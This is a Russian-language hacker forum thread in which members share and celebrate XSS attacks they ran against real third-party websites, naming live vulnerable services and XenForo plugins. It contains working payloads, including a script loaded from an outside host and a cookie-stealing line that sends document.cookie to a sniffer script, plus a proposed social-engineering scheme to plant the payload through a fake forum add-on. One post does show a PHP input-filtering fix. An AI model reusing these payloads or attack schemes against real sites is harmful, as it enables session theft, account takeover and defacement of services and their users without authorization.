• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

<script>alert('Межсайтовый нежданчик')</script>

SrDEN

IPv6
Команда форума
WebVoice
Давно хотел создать подобную тему, есть Лента дефейсов, а это будет своего рода лентой XSS-ейсов :)

Бывает такое, что разработчики плохо фильтруют входящие данные, либо вообще этого не делают, а некоторые даже и не все места предугадывают, откуда это может прийти...

В этой теме предлагаю делится подобными проектами, где у вас получилось провести атаку, желательно со скриншотами, а лучше даже видео записать. По сложившейся вебкриминальной традиции, мы любим засовывать harlem-shake
Код:
<script src="http://webcriminal.ru/files/hshake.js"></script>
вы тоже можете её продолжить, либо придумать что-то еще.

Приветствуются нестандартные атаки!

Начинаю. Сервис укорачиватель ссылок от xakeroker.ws -> xkrk.cf
На главной уже нету, вот остались примеры:
http://xkrk.cf/hello
http://xkrk.cf/h4x

Ну и собственно видео:

В данном случае, входящие данные вообще не фильтровались, все что отсылалось, появлялось на главной.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Вот еще oip.cc, как-то у нас на форуме проскакивал:

Но тут только себя повеселишь, т.к. как кроме как видео или скриншота не показать, зато входящие данные из неожиданного места :)
 

SrDEN

IPv6
Команда форума
WebVoice
Еще одна XSS-отека у xakeroker в этот раз на paste.xakeroker.in

Итог, не проверяют ребята скрипты перед установкой...
P.S. там у них еще есть, но больше лезть не буду :)
 

X-Oleg

8айтовый
WebVoice
Итог, не проверяют ребята скрипты перед установкой...
Да это паблик скрипты, которые сделаны "На коленках", у меня есть архив по мойму из 100 скриптов: Там всякие файлообменники, парсинг музыки из Вконтакте и т.д.

Было время хотел файлообменник сделать, глянул, та-же хрень с XSS в этоге удалил...:websmiles_53:

А так эти XSS могут-быть достаточно опасными, можно протроянить админов, ну или вставить туда рекламу и иметь профит с их сервисов, гы-гы...:websmiles_04:
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
А так эти XSS могут-быть достаточно опасными, можно протроянить админов, ну или вставить туда рекламу и иметь профит с их сервисов, гы-гы...:websmiles_04:
Конечно, еслиб вместо алертов и дискотеки вставили код позловещей, то это все провисело на много дольше и успело скомпрометировать всё и вся :)
 

X-Oleg

8айтовый
WebVoice
Хе, как-то писал плагин Доната для XenForo, и вот что получилось, смотрим ролик:


Вот вопрос, а насколько это опасно в моём случае ? Т.е. нужно-ли выпускать секюрити фикс ?

Ведь проэксплуатировать это практически нереально, данные берутся тоько после нажатия на кнопку "Оплатить" Post-запросом !

Кстати фиксится легко, если был такой код:

Код:
if (isset($_POST['mytext']))
{
    $Pay_Interkassa=$_POST['mytext']; //Получаем сколько нужно оплатить из формы доната...
}
else
{
    echo 'Dont Worked ! :)';
    exit();
};

Как видите $Pay_Interkassa никак не экранируется, фиксим при помощи filter_var($Pay_InterkassaGet,FILTER_SANITIZE_NUMBER_FLOAT)...

FILTER_SANITIZE_NUMBER_FLOAT - Это и есть фильтр в пхп, т.е. нам-же нужны только числа, тупо всё порежит...

Правленный код:

Код:
if (isset($_POST['mytext']))
{
    $Pay_InterkassaGet=$_POST['mytext']; //Получаем сколько нужно оплатить из формы доната...
   
    $Pay_Interkassa=filter_var($Pay_InterkassaGet,FILTER_SANITIZE_NUMBER_FLOAT); //Экранируем, чтобы не было XSS
}
else
{
    echo 'Dont Worked ! :)';
    exit();
};

Вопрос, реально-ли проэксплуатировать такую XSS и как ?
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Вопрос, реально-ли проэксплуатировать такую XSS и как ?

Конечно реально, если на сайте есть известная вам XSS, то её надо сразу же исправлять, если не знаете как, то отключать.

Данную уязвимость можно поэксплуатировать с далека. Допустим написать пользовательский скрипт допустим для greasemonkey(хотя в нашем случае это не то)лучше дополнение для форума, которое будет какой-то наворот добавлять, люди поставят(сперва правда проверят), через пару дополнений пихаем код, который после нажатия кнопки Пожертвовать, добавляет в val инпута код:
Код:
<script>document.location.replace('http://webcriminal.ru/snifer.php?nyama='+document.cookie)</script>

Пользователь даже нечего и не заметит, а наш снифер получит его куки.
Сценарий конечно на грани фантастики, но имеет место быть.

P.S. многие недооценивают опасность XSS... в общем была бы дырка, а как её проэксплуатировать мы найдем :)

P.S2. скрипт можно вставить не в таком явном виде
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@X-Oleg нашел ваш плагин, вернул XSS и развернул всё это дело на локалке. Далее воспроизвел на видео как это могло все произойти. В роли обезьянки\единорогского дополнения, будет выступать простой редактор JS. Думаю все наглядно :)


СИ + минимальные навыки программирования = гремучая смесь :)
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@X-Oleg интересно там активная xss? Если тему создать с таким тегом, то прыгала бы главная для всех пользователей :)

P.S. наверное уже исправили, так как эту тему скорее всего хакерокеры уже мониторят :)
P.S2. надо подобный плагин на локалке поставить и потестить, да и вообще глянуть популярные плагины для ксении, из-за простоты движка, их пишут все кому не лень, и скорее всего про фильтрацию, большинство плагинописателей не чего не слышали :)
 

X-Oleg

8айтовый
WebVoice
Да именно от туда и узнал, уязвимость очень неприятная, вот что можно-было сделать, если-бы я был злодеем:

1. Редактирование профилей;

2.Создание тем от имени пользователя;

3.Можно даже попробовать было прочитать ЛС при помощи этого лага...

Ещё немножко добавлю про куки, кроме httpOnly, в ксене если не делать "Запомнить меня" идёт привязка к айпишнику, поэтому кража кук ещё может непомочь, правда если стоит галочка "Запомнить меня", тогда-да могут-быть проблемы ! :(

Вот если нужно во вложении два версии этого плагина: Профиксенная и с XSS ! :)
 

Вложения

  • Tags.zip
    242,4 KB · Просмотры: 959

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@X-Oleg отлично, если на выходных будет плохая погода, то проверю свою теорию + попробую устроить атаку еще на один популярный плагин :)
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Посты о хакерокерах перенесу сюда, чтоб в этой теме оффтоп не разводить.

Ну и Апну тему XSS-кой в Spam Art table text generator-е


Натолкнулся на него случайно, и решил от делать нечего написать новый скрипт, который меняет размеры ячейкам таблицы и на фоне играет 8bit ковер на Prodigy: http://webcriminal.ru/files/table8bit.js

Скрипт писал на коленке, по этому он вряд ли универсальный, возможно потом допилю. На данный момент он находит первую таблицу, оставляет максимум 100 столбцов таблицы, и потом начинает рандом менять размеры ячеек и все это под 8bit :)

P.S. надо будет тему создать, для подобных скриптов. Лет 5-ть назад, обещался @2FED написать статью про красивые дефейсы с помощью js :websmiles_26:
 

Rufus

Б4йтовый
WebVoice
Хе, как-то писал плагин Доната для XenForo, и вот что получилось
Твой не фикшенный аддон по душе ребятам.И главное,что каждый день у нас сидят,но в упор не видят твоей обновы.
http://over-code.ru/
и в магазинчике тоже xss гуляет
http://bill.shopsu.ru/reg.php
11.gif
 
Последнее редактирование:

Rufus

Б4йтовый
WebVoice
На одном форуме,обнаружилась вот такая подборка.В xentag и в донате от Кесаева.
Админ этого форума-старый ксеновод,поэтому я предупредил его о возможных неприятностях)
Кстати с донатом имеются проблемы и здесь:
https://delhack.net/
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Админ этого форума-старый ксеновод,поэтому я предупредил его о возможных неприятностях)
Надо было веселей его предупредить :) дал бы ссылку на xss, чтоб он сообщение от своего имени написал, под шарлем шейк, ну или другую мелодию :)
 

Rufus

Б4йтовый
WebVoice
дал бы ссылку на xss, чтоб он сообщение от своего имени написал, под шарлем шейк
Толком проэксплуатировать эту хрень,я увы не смог из-за отсутствия опыта:websmiles_06:.Повозился с составлением запроса,но в итоге облом.
 

Rufus

Б4йтовый
WebVoice
Сверху